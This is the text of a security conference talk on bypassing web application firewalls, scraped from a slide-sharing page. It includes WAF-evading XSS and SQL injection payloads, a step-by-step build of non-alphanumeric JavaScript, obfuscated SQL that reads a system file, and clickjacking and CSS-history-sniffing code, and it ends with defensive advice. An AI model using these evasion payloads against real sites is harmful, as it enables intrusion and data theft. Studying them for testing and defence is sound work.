Php sec
Php secPhp sec
Php sec
 
Nove trendy-zranitelnosti
Nove trendy-zranitelnostiNove trendy-zranitelnosti
Nove trendy-zranitelnosti
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 
Nethemba profil
Nethemba profilNethemba profil
Nethemba profil
 
Mifare classic-slides
Mifare classic-slidesMifare classic-slides
Mifare classic-slides
 
1.nove trendy-zranitelnosti luptak
1.nove trendy-zranitelnosti luptak1.nove trendy-zranitelnosti luptak
1.nove trendy-zranitelnosti luptak
 
Nethemba profil
Nethemba profilNethemba profil
Nethemba profil
 

Último

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbuapidays
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Último (20)

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Bypassing Web Application Firewalls

  • 1. Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant          www.nethemba.com             www.nethemba.com      
  • 2. Nethemba – All About Security  Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)  Core business: All kinds of penetration tests, comprehensive web  application security audits, local system and wifi security audits, security  consulting, forensic analysis, secure VoIP, ultra­secure systems  OWASP activists: Leaders of Slovak/Czech OWASP chapters, co­authors  of the most recognized OWASP Testing Guide v3.0, working on new version   We are the only one in Slovakia/Czech Republic that offer:  Penetration tests and security audits of SAP  Security audit of smart RFID cards  Unique own and sponsored security research in many areas (see  our references – Vulnerabilities in public transport SMS tickets,    cracked the most used Mifare Classic RFID cards)        www.nethemba.com       
  • 3. What are WAFs?  Emerged from IDS/IPS focused on HTTP  protocol and HTTP related attacks  Usually contain a lot of complex reg­exp rules  to match  Support special features like cookie encryption,  CSRF protection, etc.  Except of free mod_security they are quite  expensive (and often there is no correlation    between the price and their filtering capabilities)         www.nethemba.com       
  • 4. WAFs implementations  Usually they are deployed in “blacklisting mode”  that is more vulnerable to bypasses and  targeted attacks  Application “context” (type of allowed inputs) is  necessary to know for deploying of more secure  “whitelisting mode”  All WAFs can by bypassed  WAF is just a workaround, but from the security    point of view it can be cost­effective        www.nethemba.com       
  • 5. WAF filter rules  Directly reflects WAF effectiveness  For most WAF vendors they are closely  guarded secrets – most determined attackers  are able to bypass them without seeing the  actual rules  Open­source WAFs (mod_security, PHPIDS)  have open source rules which is better for  more scrutiny by skilled penetration testers          www.nethemba.com       
  • 6. Typical WAF bypasses Blocked Attack Undetected modification 'or 1=1-- ' or 2=2-- alert(0) %00alert(0) <script>alert(0)</script> <script type=vbscript>MsgBox(0)</script> ' or ''''='r '/**/OR/**/''''=' <script>alert(0)</script> <img src=”x:x” onerror=”alert(0)”></img> <img src=x:x onerror=alert(0)//></img> <img src=http://url onload=alert(0)//></img> 1 or 1=1 (1)or(1)=(1) eval(name) x=this.name X(0?$:name+1)          www.nethemba.com       
  • 7. Yes, WAF may be also be vulnerable!  WAF also increases the attack surface of a  target organization  WAF may be the target of and vulnerable to  malicious attacks, e.g. XSS, SQL injection,  denial­of­service attacks, remote code  execution vulnerabilities  These vulnerabilities have been found in all  types of WAF products(!)          www.nethemba.com       
  • 8. Typical bypass flow  1. Find out which characters / sequences are  allowed by WAFs 2. Make an obfuscated version of your injected  payload 3. Test it and watch for the WAF/application  response 4. If it does not work, modify it and try step 2.          www.nethemba.com       
  • 9. Javascript obfuscation  Javascript has very powerful features  Javascript payload is used in XSS attacks  It is full of evals, expression closures, generator  expressions, iterators, special characters and  shortcuts  Supports a lot of encodings (unicode –  multibyte characters, hexadecimal, octal,  combination of all of them)   Supports XOR, “Encryption”, Base64        www.nethemba.com       
  • 10. Non­alphanumeric javascript code  Even if only few characters are allowed it is  possible to construct fully functional code:  _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"") [$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({} +"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"") [___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({} +"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({} [$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()    ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](­~Á)           www.nethemba.com       
  • 11. Let's bypass WAF!  Example situation: WAF blocks alpha  characters and numbers (probably not a very  real situation, just proof­of­concept :­)  Allows only few special characters (){}_=[];$”! +<>  Let's generate fully nonalphanumeric javascript  code!           www.nethemba.com       
  • 13. Source of different alphanumeric  characters in Javascript Javascript object / String result error state {}+'' “[object Object]” +[][+[]] “NaN” [][+[]]+[] “undefined” [![]]+[] “false”   [!![]]+[]   “true”      www.nethemba.com       
  • 14. Shortest Possible Ways to Create  Zero without Using Numbers Characters Result +[] 0 +`'` 0 +”`” 0 -[] 0 -`'` 0 -”`” 0          www.nethemba.com       
  • 15. Generating numbers  +[] //0  ++[[]][+[]] //1  +!+[] //1  ++[++[[]][+[]]][+[]] //2  !+[]+!+[] //2  ++[++[++[[]][+[]]][+[]]][+[]] //3  !+[]+!+[]+!+[] //3          www.nethemba.com       
  • 16. Gain alpha characters without  directly using them  When define Javascript object using the object  literal and concatenate with string, the result is  [object Object]  _={}+''; //[object Object]  alert(_[1]) //returns 'o' character          www.nethemba.com       
  • 17. Generate string “alert” without using  any alphanumeric characters  Let's start with 'a'   What Javascript object contains 'a'?   We can use 'NaN' (Not a Number)  Access empty string with index “0” (undefined)  and convert to number (NaN)   +[][+[]] // result: NaN          www.nethemba.com       
  • 18. Generating 'a' character  NaN[1]='a'  ++[[]][+[]] //1  +[][+[]]+[] // result string: NaN  (+[][+[]]+[])[++[[]][+[]]] //a  We have character 'a'          www.nethemba.com       
  • 19. Generating 'l' character  Use boolean false  We can use ! (NOT) operator  e.g. ''==0 //true  Use blank array (string) and then NOT operator  to obtain boolean, wrap with [] and convert it to  string  ([![]]+[]) //string “false”          www.nethemba.com       
  • 20. Generating 'l' character  ++[++[[]][+[]]][+[]] //2  ([![]]+[]) //string “false”  'false'[2] = ([![]]+[])[++[++[[]][+ []]][+[]]] // 'l'    We have 'l' character!          www.nethemba.com       
  • 21. Generating 'e' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'  ++[++[++[[]][+[]]][+[]]][+[]] //3  'true'[3] = ([!![]]+[])[++[++[++ [[]][+[]]][+[]]][+[]]] //e  And we have 'e' character!          www.nethemba.com       
  • 22. Generating 'r' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   ++[[]][+[]] //1  'true'[1] = ([!![]]+[])[++[[]][+ []]] //r  And we have 'r' character!          www.nethemba.com       
  • 23. Generating 't' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   +[] //0  'true'[0] = ([!![]]+[])[+[]] //t  And we have 't' character!          www.nethemba.com       
  • 24. And now we have 'alert' string! (+[][+[]]+[])[++[[]][+[]]]+([![]]+ [])[++[++[[]][+[]]][+[]]]+([!![]]+ [])[++[++[++[[]][+[]]][+[]]][+[]]]+ ([!![]]+[])[++[[]][+[]]]+([!![]]+ [])[+[]] //string 'alert'          www.nethemba.com       
  • 25. How to execute the code of our choice?  It is necessary to return window object to  access all properties of window   If you can access to a constructor, you can  access Function constructor to execute  arbitrary code  The shortest possible way to get window is: alert((1,[].sort)()) // shows  window object !   Works in all browsers except IE        www.nethemba.com       
  • 26. How to generate 'sort' string   We know how to generate string 'alert'  We need to generate 'sort' string 'false'[3]=([![]]+[])[++[++[++[[]] [+[]]][+[]]][+[]]] //'s'   We can gain 'o' from []+{} [object Object] ([]+{})[++[[]][+[]]] //o  We have already generated 'r' and 't'          www.nethemba.com       
  • 28. Let's build it together – call alert(1)  (1,[].sort)().alert(1)  After changing number 1 and all alpha  characters to their obfuscated version we get: ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]] [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]] +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+ []]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]] [+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+ ([!![]]+[])[+[]]](++[[]][+[]])    //calls alert(1)!        www.nethemba.com       
  • 29. How to call any arbitrary  Javascript function  Using the array constructor (accessing the  constructor twice from an array object returns  Function): [].constructor.constructor(“alert(1 )”)()   We need to generate the rest 'c','n','u' letters,  gain them from the output of [].sort function:   function sort() { [native code] }        www.nethemba.com       
  • 30. SQL obfuscation  What is obfuscation of SQL injection vector?  Different DBMS have different SQL syntax,  most of them support Unicode, Base64, hex,  octal and binary representation, escaping,  hashing algorithms (MD5, SHA­1)  Many “blacklisted” characters can be replaced  by their functional alternatives (0xA0 in MySQL)  Obfuscated comments – it is difficult to    determine what is a comment and what is not        www.nethemba.com       
  • 31. SQL obfuscation examples  SELECT CONCAT (char  (x'70617373',b'11101110110111101110010011 00100'))  s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1    SELECT  LOAD_FILE(0x633A5C626F6F742E696E69)  (M)   SELECT(extractvalue(0x3C613E61646D696E3   C2F613, 0x2F61))        www.nethemba.com       
  • 32. New SQL features  MySQL/PostgreSQL supports XML functions: SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');  HTML5 supports local DB storage (SQLite  3.1+) (openDatabase object) – can be misused  for persistent XSS, local SQL injection attacks          www.nethemba.com       
  • 33. Existing obfuscation tools  Hackvertor http://hackvertor.co.uk/public  HackBar  https://addons.mozilla.org/en­US/firefox/addon/hack  Malzilla http://malzilla.sourceforge.net/  Your imagination :)          www.nethemba.com       
  • 34. Summary  WAFs are just workarounds!  The best solution is to care about security in every SDLC  phase and strictly validate all inputs and outputs in the  application  Use whitelisting instead of blacklisting (both in the  application and WAF!)  Use multilayer security ­  3rdlayer database architecture or  database firewalls  for SQL use “prepared” statements    for HTML use HTML Purifier or OWASP AntiSamy project        www.nethemba.com       
  • 35. References  Web Application Obfuscation  http://www.amazon.com/Web­Application­Obfuscati  XSS Attacks: Cross Site Scripting Exploits and  Defense  http://www.amazon.com/XSS­Attacks­Scripting­Exp  Special thanks to Mario Heiderich and Stefano  Di Paola           www.nethemba.com       
  • 36. UI redressing attacks­ clickjacking <style> iframe { filter: alpha(opacity=0); opacity: 0; position: absolute; top: 0px; left 0px; height: 300px; width: 250px; } img { position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> <img src=”WHAT THE USERS SEES”/> <iframe src=”WHAT THE USER IS ACTUALLY INTERACTING    WITH”></iframe>        www.nethemba.com       
  • 37. Clickjacking protection  Blocks using X­FRAME/OPTIONS: NEVER  <body> <script> if (top!=self)  document.write('<plaintext>'); </script> ...          www.nethemba.com       
  • 38. CSS History attack <style> a { position: relative; } a:visited { position: absolute; } </style> <a id=”v” href=”http://www.google.com/”>Google</a> <script>  var l=document.getElementById(“v”); var c=getComputedStyle(l).position; c==”absolute”?alert(“visited”):alert(“not visited”);   </script>        www.nethemba.com       
  • 39. CSS History exploitation methods  Social network deanonymization attacks  Session ID/CSRF token local brute force attack  LAN scanners  Fixed in Firefox 4.0, current browsers are  vulnerable          www.nethemba.com